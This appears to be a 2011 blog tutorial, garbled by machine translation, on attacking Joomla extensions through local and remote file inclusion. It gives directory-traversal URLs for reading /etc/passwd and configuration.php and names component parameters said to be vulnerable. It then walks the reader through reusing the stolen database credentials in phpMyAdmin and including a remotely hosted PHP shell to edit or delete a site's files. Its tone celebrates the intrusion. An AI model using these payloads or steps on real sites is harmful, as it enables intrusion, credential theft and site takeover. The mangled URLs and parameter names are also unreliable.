Joomla Remote File Inclusions RFI Attack

19/06/2011 23:09

Local file inclusions are very funny. You tell the site what it wants. Awesome! To display the configuration file that contains the database login? No problem.

Want to see the file / etc / passwd, that Joomla is hosted on a Linux machine? You can do this.

Local file inclusions are a common problem in Joomla extensions. Many of them are vulnerable to this attack and some of them are never fixed. This can lead to a cut on the server, which is no fun at all - at least for the system administrator.

A typical vulnerable to LFI URL looks like this:

index.php? com_blablubb option = & item = 2 & view = guestbookpage

Generally, most vulnerable of the parameters are as follows:

- Driver

- View

- Disposition

- Page

To give you an idea of ​​the characteristics affected

URL, I will give you some examples that I found earlier this year:

URL:? Option = index.php & view = com_jejob some_value

Vulnerable parameter: for

URL: index.php option = & view = com_jeajaxeventcalendar some_value

Vulnerable parameters:

URL: index.php option = & controller = com_jradio some_value

Vulnerable parameter: the controller

((I found this.))

Now let's see how we can use the following:

index.php? option = com_jradio & Controller =../../../../ etc / passwd

In this case, we use the famous Nullbyte that helps us to overcome an inherent limitation in the php script component.

In the previous example, the control parameter is also used for files on local hard drive. This file contains useful information for us.

If you are not familiar with the local file inclusions suggest you consult the tutorial, because I will not explain all the details here.

Now, with the knowledge of a vulnerability in a component of Joomla BIA, we can try to access the Joomla configuration.php. This file contains interesting information.

For many LFIS also reveal the PHP source code, try the following:

index.php? Show & option = com_blabla =../../../ configuration.php

Source displays the file and get access to current database. Now find the PHPMyAdmin login on the same server, and attempts to access this information.

You can now access all the tables in Joomla, and can basically do whatever you want.

Examples of remote file inclusions Joomla

Some Joomla components are also known to include remote file inclusion vulnerabilities. RFI allows us to include files from another server and execure code on the target.

A typical URL looks URLs RFI LFI. In order to get a better sense of how to see the RFI vulnerability of a few seconds, telling examples of

URL: index.php? Option = com_sef & Itemid = & =. mosConfig.absolute.path

Vulnerable parameter: & mosConfig.absolute.path

URL: index.php? Option & task = com_jomestate =.

Vulnerable parameter: the task

When you have found a vulnerability RFI, try to include the PHP shell that is hosted on another box. Once you've downloaded, you can browse all the Joomla files and download them, edit them, delete ...

No Joomla installation is safe when there is an RFI exploit.